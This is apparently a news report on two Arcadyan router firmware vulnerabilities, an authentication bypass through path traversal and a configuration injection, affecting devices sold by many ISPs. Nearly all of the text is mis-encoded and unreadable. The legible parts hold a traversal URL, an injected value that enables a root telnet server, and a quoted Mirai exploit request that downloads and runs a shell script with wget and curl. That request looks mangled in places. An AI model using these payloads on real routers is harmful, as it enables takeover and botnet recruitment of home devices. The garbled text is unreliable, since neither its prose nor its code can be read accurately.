ืืชืงืคื ืืกืืืืช ื ืจืฉืื ืืจืฉืช ื ืื ื ืชืืื ืืืชืืื ืฉืืงืืฉืื ืฉืืื ืืฉืชืืฉืช ืืืืฉืื ืฉืจืช HTTP ืฉื ืืืจืช Arcadyan. ืืื ืืืฉืื ืฉืืืื ืขื ืืืฉืืจืื, ื ืขืฉื ืฉืืืืฉ ืืฉืืืื ืฉื ืฉืชื ื ืงืืืืช ืชืืจืคื ืืืืคืฉืจืืช ืืืฆืืข ืืจืืืง ืฉื ืงืื ืฉืจืืจืืชื ืขื ืืืืืืช ืฉืืจืฉ. ืืืขืื ืืฉืคืืขื ืขื ืืืืื ืจืื ืืืื ืฉื ื ืชืื ADSL ืืืืช Arcadyan, ASUS ื-Buffalo, ืืื ืื ืืืฉืืจืื ืืืกืืคืงืื ืชืืช ืืืืชืืื Beeline (ืืืขืื ืืืืฉืจืช ื-Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ื ืืคืขืืื ืืืงืื ืืืจืื. ืืฆืืื ืื ืืืขืื ืงืืืืช ืืงืืฉืื ืฉื Arcadyan ืืืจ ืืืชืจ ื-10 ืฉื ืื ืืืืืื ืชืงืืคื ืื ืืฆืืืื ืืขืืืจ ื-20 ืืืื ืืืฉืืจืื ืืคืืืช ื-17 ืืฆืจื ืื ืฉืื ืื.
ืืคืืืขืืช ืืจืืฉืื ื, CVE-2021-20090, ืืืคืฉืจืช ืืืฉืช ืืื ืกืงืจืืคื ืฉื ืืืฉืง ืืื ืืจื ื ืืื ืืืืืช. ืืืืช ืืคืืืขืืช ืืื ืฉืืืืฉืง ืืืื ืืจื ื, ืืืง ืืืกืคืจืืืช ืฉืืจืื ื ืฉืืืืช ืชืืื ืืช, ืงืืฆื CSS ืืกืงืจืืคืืื ืฉื JavaScript ื ืืืฉืืช ืืื ืืืืืช. ืืืงืจื ืื, ืกืคืจืืืช ืฉืขืืืจื ืืืชืจืช ืืืฉื ืืื ืืืืืช ื ืืืงืืช ืืืืฆืขืืช ืืืกืื ืืจืืฉืื ืืช. ืฆืืื ืชืืื "../" ืื ืชืืืื ืืืขืืจ ืืกืคืจืืืช ืืื ืืกืืื ืขื ืืื ืืงืืฉืื, ืื ืืฉืืืืฉ ืืฉืืืื "..%2f" ื ืืื. ืืคืืื, ื ืืชื ืืคืชืื ืืคืื ืืืื ืื ืืขืช ืฉืืืืช ืืงืฉืืช ืืื "http://192.168.1.1/images/..%2findex.htm".
ืืคืืืขืืช ืืฉื ืืื, CVE-2021-20091, ืืืคืฉืจืช ืืืฉืชืืฉ ืืืืืช ืืืฆืข ืฉืื ืืืื ืืืืืจืืช ืืืขืจืืช ืฉื ืืืืฉืืจ ืขื ืืื ืฉืืืืช ืคืจืืืจืื ืืคืืจืื ืืืืื ืืกืงืจืืคื application_abstract.cgi, ืฉืืื ื ืืืืง ืืช ื ืืืืืชื ืฉื ืชื ืืืฉ ืืคืจืืืจืื . ืืืืืื, ืืขืช ืืืฆืืข ืคืขืืืช ืคืื ื, ืชืืงืฃ ืืืื ืืฆืืื ืืช ืืขืจื "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ืืฉืื ืขื ืืชืืืช ื-IP ืืืกืืื ืช, ืืืกืงืจืืคื, ืืขืช ืืฆืืจืช ืงืืืฅ ืืืืืจืืช /tmp/etc/config/ .glbcfg, ืืืชืื ืืช ืืฉืืจื "AARC_SYS_TelnetdEnable=1" ืืชืืื ", ืื ืฉืืคืขืื ืืช ืฉืจืช telnetd, ืืืกืคืง ืืืฉื ืืืขืืคืช ืคืงืืื ืืืชื ืืืืืืช ืขื ืืืืืืช ืฉืืจืฉ. ืืืืคื ืืืื, ืขื ืืื ืืืืจืช ืืคืจืืืจ AARC_SYS, ืืชื ืืืื ืืืคืขืื ืื ืงืื ืืืขืจืืช. ืืคืืืขืืช ืืจืืฉืื ื ืืืคืฉืจืช ืืืจืืฅ ืกืงืจืืคื ืืขืืืชื ืืื ืืืืืช ืขื ืืื ืืืฉื ืืืื ืืชืืจ "/images/..%2fapply_abstract.cgi".
ืืื ืื ืฆื ื ืงืืืืช ืชืืจืคื, ืชืืงืฃ ืืืื ืืืืืช ืืกืืื ืืฉืืื ืืงืฉื ืืืฆืืืช ืืจืฉืช ืฉืื ืืืฉืง ืืืื ืืจื ื ืคืืขื. ืื ืืฉืคืื ืืคื ืืืื ืืืงื ืฉื ืืชืคืฉืืืช ืืืชืงืคื, ืืคืขืืืื ืจืืื ืืฉืืืจืื ืืืฉื ืืืืฉืืจืืื ืืืจืฉืช ืืืืฆืื ืืช ืืื ืืคืฉื ืืช ืืืืืื ืฉื ืืขืืืช ืขื ืืื ืฉืืจืืช ืืชืืืื. ืื ืืืืฉื ืืืืฉืง ืืืืืืช ืจืง ืืจืฉืช ืืคื ืืืืช, ื ืืชื ืืืฆืข ืืชืงืคื ืืจืฉืช ืืืฆืื ืืช ืืืื ืืงืช "DNS rebinding". ืคืืืขืืืืช ืืืจ ื ืืฆืืืช ืืฉืืืืฉ ืคืขืื ืืืืืืจ ื ืชืืื ื-Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 ืืืืืจ: ืกืืืจ User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
ืืงืืจ: OpenNet.ru